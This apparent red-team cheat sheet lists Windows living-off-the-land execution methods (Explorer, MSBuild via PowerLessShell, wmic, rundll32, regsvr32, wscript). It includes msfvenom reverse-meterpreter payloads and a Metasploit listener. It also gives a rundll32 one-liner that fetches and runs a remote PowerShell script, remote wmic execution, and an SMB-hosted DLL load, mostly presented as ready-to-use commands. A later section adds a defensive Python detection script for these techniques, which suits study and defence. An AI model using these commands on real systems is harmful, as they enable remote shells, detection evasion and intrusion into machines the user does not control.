# File Execution Methods

### Explorer

```bash
explorer.exe /root,"C:\Windows\System32\calc.exe"
explorer.exe /root,"C:\Windows\Temp\Shell.exe"
```

### PowerLessShell

PowerLessShell is a Python-based tool that generates malicious code to run on a target machine without showing an instance of the `PowerShell` process. PowerLessShell relies on abusing the Microsoft Build Engine (MSBuild), a platform for building Windows applications, to execute remote code.

**GitHub:** <https://github.com/Mr-Un1k0d3r/PowerLessShell>

After cloning the repository, generate an `msfvenom` payload with the syntax shown below.

```bash
msfvenom -p windows/meterpreter/reverse_winhttps LHOST=<IP> LPORT=445 -f psh-reflection > shell.ps1
```

Set up a `Metasploit` listener:

```bash
msfconsole -q -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_winhttps; set lhost <IP>;set lport 445;exploit"
```

From the PowerLessShell repository, build the project file:

```bash
python2 PowerLessShell.py -type powershell -source ~/opt/shell.ps1  -output ~/opt/shell.csproj
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F11FmrlMauIijpVJ3ZAZ0%2Fimage.png?alt=media\&token=eb49425d-50c4-425c-b480-0f9622004a88)

After the build completes, transfer the `.csproj` file to the target system and execute it with MSBuild using the command below (the framework version in the path will vary).

```powershell
c:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe c:\windows\temp\shell.csproj
```

Wait a short while...

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FXxCZXbmwTWtqfnRgGFyg%2Fimage.png?alt=media\&token=fee7c1f4-6c61-44eb-8cad-26a8bac4cf19)

We should land a shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FSboJLZfoeBqxHhFxsABC%2Fimage.png?alt=media\&token=68a4bd99-4ac8-46d2-881c-cac70067bbc4)

Checking the running processes on the target system while the shell is active shows no `PowerShell.exe` process running.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FYpPv0RY68Oq5E6fnavEv%2Fimage.png?alt=media\&token=a9e44469-73bf-44e6-b598-da2bd4524123)

### Wmic

```bash
# Execute binary on local system
wmic.exe process call create c:\windows\temp\Shell.exe

# Execute binary on remote system
wmic.exe /node:"10.10.10.10" process call create "Shell.exe"
```

### Rundll32

```powershell
# Execute JavaScript script that runs a PowerShell script from a remote server
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://<IP>/<File.ps1>');"

# Execute a JavaScript script that runs calc.exe.
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");

# Execute a DLL from an SMB share. EntryPoint is the name of the exported entry point in the DLL to call.
rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint
```

### Regsvr32

```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=445 -f dll -a x86 > Shell.dll
```

Upload the DLL to the target system and execute it:

```powershell
regsvr32.exe c:\windows\temp\shell.dll
```

### WScript

WScript can run VBScript stored in a file with any extension, here a `.txt` file, which sidesteps controls that only blacklist the `.vbs` extension.

```powershell
c:\Windows\System32>wscript /e:VBScript c:\Users\moe\Desktop\shell.txt
```
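As an added detection example, not part of the original page and not code from the PowerLessShell project, the script below classifies constructed process-creation records against the execution methods listed above: Explorer with `/root,`, MSBuild loading a project file from a user-writable directory, `wmic process call create` (local and `/node:` remote), `rundll32` with the `javascript:` protocol or a UNC DLL path, `regsvr32` loading a DLL from a temp directory, and `wscript /e:` pointed at a file without a script extension. The event field names, the sample events and the rule names are assumptions made for this demo; a real deployment would feed it Sysmon Event ID 1 or Security 4688 records.

```python
"""Flag process-creation events matching the execution methods listed above.

All events below are constructed for this example; field names follow a
simplified Sysmon-style layout (image, command line, parent image).
"""
import re
from collections import namedtuple

Event = namedtuple("Event", "image command_line parent_image")

# Directories an unprivileged user can usually write to (assumed list).
USER_WRITABLE = re.compile(r"(\\temp\\|\\users\\|\\appdata\\|\\programdata\\)", re.I)
# Extensions the script hosts normally run; anything else with /e: is suspicious.
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh")


def _base(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def _last_arg(cmd):
    """Last whitespace-separated token of a command line, quotes stripped."""
    parts = cmd.split()
    return parts[-1].strip('"') if parts else ""


def classify(ev):
    """Return the technique names (assumed labels) an event matches; [] if none."""
    img = _base(ev.image)
    cmd = ev.command_line
    low = cmd.lower()
    hits = []
    if img == "explorer.exe" and "/root," in low:
        hits.append("explorer_root_launch")
    if img == "msbuild.exe" and USER_WRITABLE.search(cmd) and \
            re.search(r"\.(csproj|vbproj|proj|xml)\b", low):
        hits.append("msbuild_project_from_user_dir")
    if img == "wmic.exe" and "process call create" in low:
        hits.append("wmic_remote_process_create" if "/node:" in low
                    else "wmic_process_create")
    if img == "rundll32.exe":
        if "javascript:" in low or "runhtmlapplication" in low:
            hits.append("rundll32_script_protocol")
        if re.search(r"\\\\[^\\]+\\[^\s,]+\.dll", low):
            hits.append("rundll32_unc_dll")
    if img == "regsvr32.exe" and USER_WRITABLE.search(cmd):
        hits.append("regsvr32_user_dir_dll")
    if img in ("wscript.exe", "cscript.exe") and "/e:" in low:
        if not _last_arg(low).endswith(SCRIPT_EXTS):
            hits.append("wscript_engine_override_nonscript_ext")
    # The MSBuild method above runs PowerShell in-process, so no powershell.exe
    # appears; a powershell.exe that does spawn from MSBuild is still worth a look.
    if img == "powershell.exe" and _base(ev.parent_image) == "msbuild.exe":
        hits.append("powershell_child_of_msbuild")
    return hits


def scan(events):
    """Return [(index, technique), ...] for every match over the event list."""
    return [(i, t) for i, ev in enumerate(events) for t in classify(ev)]


MSBUILD = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

# Constructed sample events: 0-6 and 11 mirror the methods on this page,
# 7-10 are benign look-alikes that should not fire.
EVENTS = [
    Event(r"C:\Windows\explorer.exe", r'explorer.exe /root,"C:\Windows\Temp\Shell.exe"', r"C:\Windows\System32\cmd.exe"),
    Event(MSBUILD, MSBUILD + r" c:\windows\temp\shell.csproj", r"C:\Windows\System32\cmd.exe"),
    Event(r"C:\Windows\System32\wbem\wmic.exe", r'wmic.exe /node:"10.10.10.10" process call create "Shell.exe"', r"C:\Windows\System32\cmd.exe"),
    Event(r"C:\Windows\System32\rundll32.exe", r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("...")', r"C:\Windows\System32\cmd.exe"),
    Event(r"C:\Windows\System32\rundll32.exe", r"rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint", r"C:\Windows\System32\cmd.exe"),
    Event(r"C:\Windows\System32\regsvr32.exe", r"regsvr32.exe c:\windows\temp\shell.dll", r"C:\Windows\System32\cmd.exe"),
    Event(r"C:\Windows\System32\wscript.exe", r"wscript /e:VBScript c:\Users\moe\Desktop\shell.txt", r"C:\Windows\System32\cmd.exe"),
    Event(r"C:\Windows\explorer.exe", r"explorer.exe C:\Users\moe\Documents", r"C:\Windows\System32\userinit.exe"),
    Event(MSBUILD, MSBUILD + r" C:\Projects\App\App.csproj /t:Build", r"C:\Windows\System32\cmd.exe"),
    Event(r"C:\Windows\System32\regsvr32.exe", r"regsvr32.exe /s C:\Windows\System32\example.dll", r"C:\Windows\System32\msiexec.exe"),
    Event(r"C:\Windows\System32\wscript.exe", r"wscript.exe C:\Users\moe\logon.vbs", r"C:\Windows\explorer.exe"),
    Event(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"powershell.exe -nop -w hidden", MSBUILD),
]

if __name__ == "__main__":
    for i, technique in scan(EVENTS):
        print(f"event {i}: {technique} :: {EVENTS[i].command_line}")
```

The MSBuild rule keys on the project file living in a user-writable directory rather than on MSBuild itself, since developer builds from `C:\Users\...` are legitimate; in practice that rule is tuned per environment (build servers excluded, or a parent-process allow list). The last rule exists precisely because the PowerLessShell method leaves no `powershell.exe` behind: process listings alone will not show it, so the MSBuild command line and the project file path are the artefacts worth logging.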

### Shortcuts

WIP
